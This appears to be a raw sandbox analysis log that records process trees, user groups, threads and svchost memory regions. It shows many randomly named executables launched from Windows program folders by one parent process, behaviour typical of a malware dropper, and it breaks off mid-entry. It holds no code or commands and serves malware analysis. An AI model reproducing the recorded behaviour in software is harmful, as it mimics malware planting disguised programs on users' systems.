"NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 699 os_tid = 0xf54 Thread: id = 700 os_tid = 0xef0 Thread: id = 701 os_tid = 0xab8 Thread: id = 702 os_tid = 0xaac Thread: id = 703 os_tid = 0xaa8 Thread: id = 704 os_tid = 0xaa4 Thread: id = 705 os_tid = 0xaa0 Thread: id = 706 os_tid = 0xa9c Thread: id = 707 os_tid = 0xa98 Thread: id = 708 os_tid = 0xa94 Thread: id = 709 os_tid = 0xa90 Thread: id = 710 os_tid = 0xa8c Thread: id = 711 os_tid = 0xa88 Thread: id = 712 os_tid = 0xa84 Thread: id = 713 os_tid = 0xa78 Thread: id = 714 os_tid = 0xa64 Thread: id = 715 os_tid = 0xa5c Thread: id = 716 os_tid = 0xa58 Thread: id = 717 os_tid = 0xa50 Thread: id = 718 os_tid = 0xa4c Thread: id = 719 os_tid = 0xa38 Thread: id = 720 os_tid = 0xa28 Thread: id = 721 os_tid = 0xa20 Process: id = "59" image_name = "nigeria reached hindu.exe" filename = "c:\\program files\\reference assemblies\\nigeria reached hindu.exe" page_root = "0xf784000" os_pid = "0x1fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files\\Reference Assemblies\\nigeria reached hindu.exe\" " cur_dir = "C:\\Program Files\\Reference Assemblies\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 722 os_tid = 0x918 Thread: id = 723 os_tid = 0x200 Process: id = "60" image_name = "style-percent.exe" filename = "c:\\program files\\windows media player\\style-percent.exe" page_root = "0x181a5000" os_pid = "0x328" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files\\Windows Media Player\\style-percent.exe\" " cur_dir = "C:\\Program Files\\Windows Media Player\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 724 os_tid = 0xa2c Thread: id = 725 os_tid = 0x34c Process: id = "61" image_name = "italian.exe" filename = "c:\\program files\\uninstall information\\italian.exe" page_root = "0x671bc000" os_pid = "0x404" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files\\Uninstall Information\\italian.exe\" " cur_dir = "C:\\Program Files\\Uninstall Information\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 726 os_tid = 0xf0 Thread: id = 727 os_tid = 0x438 Process: id = "62" image_name = "november.exe" filename = "c:\\program files (x86)\\google\\november.exe" page_root = "0x101d3000" os_pid = "0x520" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files (x86)\\Google\\november.exe\" " cur_dir = "C:\\Program Files (x86)\\Google\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 728 os_tid = 0x1a4 Thread: id = 729 os_tid = 0x5f0 Process: id = "63" image_name = "photoshop_hormone_protein.exe" filename = "c:\\program files (x86)\\windows media player\\photoshop_hormone_protein.exe" page_root = "0xb723000" os_pid = "0xa80" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files (x86)\\Windows Media Player\\photoshop_hormone_protein.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Media Player\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 730 os_tid = 0x2f4 Thread: id = 731 os_tid = 0xa7c Process: id = "64" image_name = "expenditurevincenttablet.exe" filename = "c:\\program files\\msbuild\\expenditurevincenttablet.exe" page_root = "0x17ee3000" os_pid = "0x514" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 732 os_tid = 0x4e8 Thread: id = 733 os_tid = 0x778 Process: id = "65" image_name = "deaths.exe" filename = "c:\\program files (x86)\\windows nt\\deaths.exe" page_root = "0x1de43000" os_pid = "0x2f0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files (x86)\\Windows NT\\deaths.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows NT\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 734 os_tid = 0xb6c Thread: id = 735 os_tid = 0x7bc Process: id = "66" image_name = "alfred.exe" filename = "c:\\program files\\microsoft office 15\\alfred.exe" page_root = "0x3a062000" os_pid = "0x534" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files\\Microsoft Office 15\\alfred.exe\" " cur_dir = "C:\\Program Files\\Microsoft Office 15\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 736 os_tid = 0x84 Thread: id = 737 os_tid = 0xbdc Process: id = "67" image_name = "admit.exe" filename = "c:\\program files (x86)\\reference assemblies\\admit.exe" page_root = "0x117fb000" os_pid = "0xb3c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files (x86)\\Reference Assemblies\\admit.exe\" " cur_dir = "C:\\Program Files (x86)\\Reference Assemblies\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 738 os_tid = 0x418 Thread: id = 739 os_tid = 0x85c Process: id = "68" image_name = "set.exe" filename = "c:\\program files (x86)\\windows nt\\set.exe" page_root = "0xb324000" os_pid = "0x8a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files (x86)\\Windows NT\\set.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows NT\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 740 os_tid = 0xadc Thread: id = 741 os_tid = 0x390 Process: id = "69" image_name = "regulations_consensus_score.exe" filename = "c:\\program files (x86)\\windows portable devices\\regulations_consensus_score.exe" page_root = "0xec43000" os_pid = "0x380" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files (x86)\\Windows Portable Devices\\regulations_consensus_score.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Portable Devices\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 742 os_tid = 0x9b8 Thread: id = 743 os_tid = 0x8d0 Process: id = "70" image_name = "upgrading.exe" filename = "c:\\program files (x86)\\common files\\upgrading.exe" page_root = "0x5063000" os_pid = "0x854" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files (x86)\\Common Files\\upgrading.exe\" " cur_dir = "C:\\Program Files (x86)\\Common Files\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 744 os_tid = 0xbf8 Thread: id = 745 os_tid = 0x454 Process: id = "71" image_name = "syria promptly.exe" filename = "c:\\program files (x86)\\google\\syria promptly.exe" page_root = "0x4b997000" os_pid = "0x504" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files (x86)\\Google\\syria promptly.exe\" " cur_dir = "C:\\Program Files (x86)\\Google\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 746 os_tid = 0x2c4 Thread: id = 747 os_tid = 0x1f4 Process: id = "72" image_name = "tones engaging.exe" filename = "c:\\program files\\windows multimedia platform\\tones engaging.exe" page_root = "0x47db2000" os_pid = "0x8cc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\" " cur_dir = "C:\\Program Files\\Windows Multimedia Platform\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 748 os_tid = 0x708 Thread: id = 749 os_tid = 0x950 Process: id = "73" image_name = "restaurant.exe" filename = "c:\\program files\\windows portable devices\\restaurant.exe" page_root = "0x7acd000" os_pid = "0x52c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\" " cur_dir = "C:\\Program Files\\Windows Portable Devices\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 750 os_tid = 0x120 Thread: id = 751 os_tid = 0xbf4 Process: id = "74" image_name = "th-italia.exe" filename = "c:\\program files\\windows mail\\th-italia.exe" page_root = "0x1083e000" os_pid = "0x41c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x820" cmd_line = "\"C:\\Program Files\\Windows Mail\\th-italia.exe\" " cur_dir = "C:\\Program Files\\Windows Mail\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 752 os_tid = 0x700 Thread: id = 753 os_tid = 0x2d4 Process: id = "75" image_name = "audiodg.exe" filename = "c:\\windows\\system32\\audiodg.exe" page_root = "0x9754000" os_pid = "0x164" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x340" cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0x80c" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xe], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xe], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1df" [0xc000000f], "LOCAL" [0x7] Thread: id = 754 os_tid = 0xb60 Thread: id = 755 os_tid = 0xb58 Thread: id = 756 os_tid = 0x814 Thread: id = 757 os_tid = 0x8d8 Thread: id = 758 os_tid = 0x860 Process: id = "76" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x594bd000" os_pid = "0x458" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4969 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4970 start_va = 0xe45d3e0000 end_va = 0xe45d3effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e45d3e0000" filename = "" Region: id = 4971 start_va = 0xe45d3f0000 end_va = 0xe45d3f0fff entry_point = 0xe45d3f0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 4972 start_va = 0xe45d400000 end_va = 0xe45d413fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e45d400000" filename = "" Region: id = 4973 start_va = 0xe45d420000 end_va = 0xe45d49ffff entry_point = 0x0 region_type = private name = "private_0x000000e45d420000" filename = "" Region: id = 4974 start_va = 0xe45d4a0000 end_va = 0xe45d4a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e45d4a0000" filename = "" Region: id = 4975 start_va = 0xe45d4b0000 end_va = 0xe45d4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e45d4b0000" filename = "" Region: id = 4976 start_va = 0xe45d4c0000 end_va = 0xe45d4c1fff entry_point = 0x0 region_type = private name = "private_0x000000e45d4c0000" filename = "" Region: id = 4977 start_va = 0xe45d4d0000 end_va = 0xe45d4d0fff entry_point = 0x0 region_type = private name = "private_0x000000e45d4d0000" filename = "" Region: id = 4978 start_va = 0xe45d4e0000 end_va = 0xe45d4e0fff entry_point = 0x0 region_type = private name = "private_0x000000e45d4e0000" filename = "" Region: id = 4979 start_va = 0xe45d4f0000 end_va = 0xe45d4f0fff entry_point = 0xe45d4f0000 region_type = mapped_file name = "phoneutilres.dll" filename = "\\Windows\\System32\\PhoneutilRes.dll" (normalized: "c:\\windows\\system32\\phoneutilres.dll") Region: id = 4980 start_va = 0xe45d500000 end_va = 0xe45d500fff entry_point = 0x0 region_type = private name = "private_0x000000e45d500000" filename = "" Region: id = 4981 start_va = 0xe45d510000 end_va = 0xe45d510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e45d510000" filename = "" Region: id = 4982 start_va = 0xe45d520000 end_va = 0xe45d520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e45d520000" filename = "" Region: id = 4983 start_va = 0xe45d530000 end_va = 0xe45d530fff entry_point = 0xe45d530000 region_type = mapped_file name = "syncres.dll" filename = "\\Windows\\System32\\SyncRes.dll" (normalized: "c:\\windows\\system32\\syncres.dll") Region: id = 4984 start_va = 0xe45d540000 end_va = 0xe45d546fff entry_point = 0x0 region_type = private name = "private_0x000000e45d540000" filename = "" Region: id = 4985 start_va = 0xe45d600000 end_va = 0xe45d6fffff entry_point = 0x0 region_type = private name = "private_0x000000e45d600000" filename = "" Region: id = 4986 start_va = 0xe45d700000 end_va = 0xe45d7bdfff entry_point = 0xe45d700000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4987 start_va = 0xe45d8a0000 end_va = 0xe45d8a6fff entry_point = 0x0 region_type = private name = "private_0x000000e45d8a0000" filename = "" Region: id = 4988 start_va = 0xe45d900000 end_va = 0xe45d9fffff entry_point = 0x0 region_type = private name = "private_0x000000e45d900000" filename = "" Region: id = 4989 start_va = 0xe45da00000 end_va = 0xe45db87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e45da00000" filename = "" Region: id = 4990 start_va = 0xe45db90000 end_va = 0xe45dd10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e45db90000" filename = "" Region: id = 4991 start_va = 0xe45dd20000 end_va = 0xe45f11ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e45dd20000" filename = "" Region: id = 4992 start_va = 0xe45f120000 end_va = 0xe45f21ffff entry_point = 0x0 region_type = private name = "private_0x000000e45f120000" filename = "" Region: id = 4993 start_va = 0xe45f220000 end_va = 0xe45f31ffff entry_point = 0x0 region_type = private name = "private_0x000000e45f220000" filename = "" Region: id = 4994 start_va = 0xe45f320000 end_va = 0xe45f41ffff entry_point = 0x0 region_type = private name = "private_0x000000e45f320000" filename = "" Region: id = 4995 start_va = 0xe45f420000 end_va = 0xe45f51ffff entry_point = 0x0 region_type = private name = "private_0x000000e45f420000" filename = "" Region: id = 4996 start_va = 0x7df5ff830000 end_va = 0x7ff5ff82ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff830000" filename = "" Region: id = 4997 start_va = 0x7ff787090000 end_va = 0x7ff78718ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787090000" filename = "" Region: id = 4998 start_va = 0x7ff787190000 end_va = 0x7ff7871b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787190000" filename = "" Region: id = 4999 start_va = 0x7ff7871b6000 end_va = 0x7ff7871b7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7871b6000" filename = "" Region: id = 5000 start_va = 0x7ff7871b8000 end_va = 0x7ff7871b8fff entry_point = 0x0 region_type = private name = "private_0x00007ff7871b8000" filename = "" Region: id = 5001 start_va = 0x7ff7871ba000 end_va = 0x7ff7871bbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7871ba000" filename = "" Region: id = 5002 start_va = 0x7ff7871bc000 end_va = 0x7ff7871bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7871bc000" filename = "" Region: id = 5003 start_va = 0x7ff7871be000 end_va = 0x7ff7871bffff entry_point = 0x0 region_type = private name = "private_0x00007ff7871be000" filename = "" Region: id = 5004 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 5005 start_va = 0x7ffade660000 end_va = 0x7ffade695fff entry_point = 0x7ffade660000 region_type = mapped_file name = "accountaccessor.dll" filename = "\\Windows\\System32\\accountaccessor.dll" (normalized: "c:\\windows\\system32\\accountaccessor.dll") Region: id = 5006 start_va = 0x7ffade6a0000 end_va = 0x7ffade6dffff entry_point = 0x7ffade6a0000 region_type = mapped_file name = "cemapi.dll" filename = "\\Windows\\System32\\cemapi.dll" (normalized: "c:\\windows\\system32\\cemapi.dll") Region: id = 5007 start_va = 0x7ffade6e0000 end_va = 0x7ffade6f0fff entry_point = 0x7ffade6e0000 region_type = mapped_file name = "userdatalanguageutil.dll" filename = "\\Windows\\System32\\UserDataLanguageUtil.dll" (normalized: "c:\\windows\\system32\\userdatalanguageutil.dll") Region: id = 5008 start_va = 0x7ffade7c0000 end_va = 0x7ffade82bfff entry_point = 0x7ffade7c0000 region_type = mapped_file name = "synccontroller.dll" filename = "\\Windows\\System32\\SyncController.dll" (normalized: "c:\\windows\\system32\\synccontroller.dll") Region: id = 5009 start_va = 0x7ffadeae0000 end_va = 0x7ffadeb20fff entry_point = 0x7ffadeae0000 region_type = mapped_file name = "phoneutil.dll" filename = "\\Windows\\System32\\Phoneutil.dll" (normalized: "c:\\windows\\system32\\phoneutil.dll") Region: id = 5010 start_va = 0x7ffadeb30000 end_va = 0x7ffadeca0fff entry_point = 0x7ffadeb30000 region_type = mapped_file name = "pimstore.dll" filename = "\\Windows\\System32\\Pimstore.dll" (normalized: "c:\\windows\\system32\\pimstore.dll") Region: id = 5011 start_va = 0x7ffadecb0000 end_va = 0x7ffadecf6fff entry_point = 0x7ffadecb0000 region_type = mapped_file name = "syncutil.dll" filename = "\\Windows\\System32\\syncutil.dll" (normalized: "c:\\windows\\system32\\syncutil.dll") Region: id = 5012 start_va = 0x7ffaded00000 end_va = 0x7ffaded15fff entry_point = 0x7ffaded00000 region_type = mapped_file name = "userdataplatformhelperutil.dll" filename = "\\Windows\\System32\\UserDataPlatformHelperUtil.dll" (normalized: "c:\\windows\\system32\\userdataplatformhelperutil.dll") Region: id = 5013 start_va = 0x7ffaded20000 end_va = 0x7ffaded36fff entry_point = 0x7ffaded20000 region_type = mapped_file name = "networkhelper.dll" filename = 